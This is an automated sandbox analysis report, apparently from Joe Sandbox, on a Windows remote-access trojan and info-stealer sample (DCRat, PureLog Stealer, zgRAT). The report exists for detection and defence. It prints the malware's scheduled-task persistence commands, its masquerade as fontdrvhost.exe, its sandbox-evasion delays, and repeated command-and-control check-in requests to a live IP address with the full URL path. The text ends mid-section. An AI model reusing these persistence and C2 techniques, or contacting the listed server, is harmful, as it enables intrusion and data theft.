Windows Analysis Report
ZT3pxe2Tb4.exe

Overview

General Information

Sample name: ZT3pxe2Tb4.exe (renamed because original name is a hash value)
Original sample name: 4164D5955C244FF266C1CC41013FE21A.exe
Analysis ID: 1417387
MD5: 4164d5955c244ff266c1cc41013fe21a
SHA1: cd4b6caab8b3762d3af3b7ad738f51d2e92c2d34
SHA256: 138905d6721c1e6b174b6f61154a938565c9bd5c6b5b0abe8274054bf151da9c
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZT3pxe2Tb4.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\ZT3pxe2Tb4.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
    • schtasks.exe (PID: 5332 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3512 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4908 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1704 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7080 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • fontdrvhost.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
        • cmd.exe (PID: 7560 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7628 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7644 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • fontdrvhost.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
            • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 3868 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 6128 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • fontdrvhost.exe (PID: 7300 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                • cmd.exe (PID: 2816 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 7448 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 7488 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • fontdrvhost.exe (PID: 5572 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                    • cmd.exe (PID: 7816 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 6812 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • PING.EXE (PID: 6976 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                      • fontdrvhost.exe (PID: 7272 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                        • cmd.exe (PID: 7916 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 7620 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • w32tm.exe (PID: 7612 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                          • fontdrvhost.exe (PID: 2288 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
  • fontdrvhost.exe (PID: 5496 cmdline: C:\Users\user\AppData\Local\fontdrvhost.exe MD5: 4164D5955C244FF266C1CC41013FE21A)
    • cmd.exe (PID: 7288 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7332 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7344 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • fontdrvhost.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
        • cmd.exe (PID: 7900 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7952 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7968 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • fontdrvhost.exe (PID: 3624 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
            • cmd.exe (PID: 3592 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7704 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 7360 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • fontdrvhost.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                • cmd.exe (PID: 984 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fontdrvhost.exe (PID: 6648 cmdline: C:\Users\user\AppData\Local\fontdrvhost.exe MD5: 4164D5955C244FF266C1CC41013FE21A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
ZT3pxe2Tb4.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
ZT3pxe2Tb4.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\fontdrvhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\user\AppData\Local\fontdrvhost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: ZT3pxe2Tb4.exe PID: 4484 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: fontdrvhost.exe PID: 5496 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: fontdrvhost.exe PID: 6648 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                        System Summary

                        Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\ZT3pxe2Tb4.exe, ProcessId: 4484, TargetFilename: C:\Users\user\AppData\Local\fontdrvhost.exe
                        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f, CommandLine: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ZT3pxe2Tb4.exe", ParentImage: C:\Users\user\Desktop\ZT3pxe2Tb4.exe, ParentProcessId: 4484, ParentProcessName: ZT3pxe2Tb4.exe, ProcessCommandLine: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f, ProcessId: 5332, ProcessName: schtasks.exe
                        Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
                        03/29/24-07:38:03.072563 | 2048095 | 49745 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:10.589011 | 2048095 | 49731 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:41.258721 | 2048095 | 49742 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:01.421586 | 2048095 | 49730 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:37.301200 | 2048095 | 49741 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:38:15.792609 | 2048095 | 49746 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:55.065041 | 2048095 | 49744 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:32.317096 | 2048095 | 49740 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:38:55.054545 | 2048095 | 49749 | 80 | TCP | A Network Trojan was detected
                        03/29/24-07:37:19.143924 | 2048095 | 49738 | 80 | TCP | A Network Trojan was detected

                        AV Detection

                        Source: ZT3pxe2Tb4.exe | Avira: detected
                        Source: C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat | Avira: detection malicious, Label: BAT/Runner.IL
                        Source: C:\Users\user\Desktop\DACRVJoK.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat | Avira: detection malicious, Label: BAT/Runner.IL
                        Source: C:\Users\user\Desktop\CgRzmzKC.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                        Source: C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\Desktop\ELDRalsN.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                        Source: C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat | Avira: detection malicious, Label: BAT/Runner.IL
                        Source: C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\Desktop\CGTrJaEm.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                        Source: C:\Users\user\Desktop\AFOsBjYP.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                        Source: C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat | Avira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | ReversingLabs: Detection: 86%
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Virustotal: Detection: 72%
                        Source: C:\Users\user\Desktop\AFOsBjYP.log | Virustotal: Detection: 19%
                        Source: C:\Users\user\Desktop\AaPSReOe.log | Virustotal: Detection: 7%
                        Source: C:\Users\user\Desktop\CGTrJaEm.log | ReversingLabs: Detection: 66%
                        Source: C:\Users\user\Desktop\CGTrJaEm.log | Virustotal: Detection: 69%
                        Source: C:\Users\user\Desktop\COTaDrJc.log | Virustotal: Detection: 21%
                        Source: C:\Users\user\Desktop\CTQIQVae.log | Virustotal: Detection: 7%
                        Source: C:\Users\user\Desktop\CgRzmzKC.log | ReversingLabs: Detection: 66%
                        Source: C:\Users\user\Desktop\CgRzmzKC.log | Virustotal: Detection: 69%
                        Source: C:\Users\user\Desktop\CkrRJHNx.log | Virustotal: Detection: 8%
                        Source: C:\Users\user\Desktop\DACRVJoK.log | Virustotal: Detection: 7%
                        Source: C:\Users\user\Desktop\FWXhQVXq.log | Virustotal: Detection: 19%
                        Source: C:\Users\user\Desktop\FWzHsBqG.log | Virustotal: Detection: 7%
                        Source: ZT3pxe2Tb4.exe | ReversingLabs: Detection: 86%
                        Source: ZT3pxe2Tb4.exe | Virustotal: Detection: 73%
                        Source: C:\Users\user\Desktop\CTQIQVae.log | Joe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\CkrRJHNx.log | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\AaPSReOe.log | Joe Sandbox ML: detected
                        Source: ZT3pxe2Tb4.exe | Joe Sandbox ML: detected

                        Compliance

                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe | Unpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
                        Source: ZT3pxe2Tb4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: ZT3pxe2Tb4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | File opened: C:\Users\user
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | File opened: C:\Users\user\Documents\desktop.ini
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | File opened: C:\Users\user\AppData
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | File opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | File opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | File opened: C:\Users\user\AppData\Local
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 0_2_00007FFD9BBCD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 8_2_00007FFD9BBAD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then jmp 00007FFD9BA21F76h | 9_2_00007FFD9BA21D6E
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 14_2_00007FFD9BBDD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then jmp 00007FFD9BA01F76h | 21_2_00007FFD9BA01D6E
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 21_2_00007FFD9BBAD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 27_2_00007FFD9BBBD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 34_2_00007FFD9BB9D16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then jmp 00007FFD9BA21F76h | 35_2_00007FFD9BA21D6E
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 35_2_00007FFD9BBCD16D

                        Networking

                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49731 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49740 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49749 -> 89.23.98.225:80
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.98.225Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global traffic
                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                        Host: 89.23.98.225
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: global traffic
                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: 89.23.98.225
                        Content-Length: 336
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: global traffic
                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                        Host: 89.23.98.225
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: global traffic
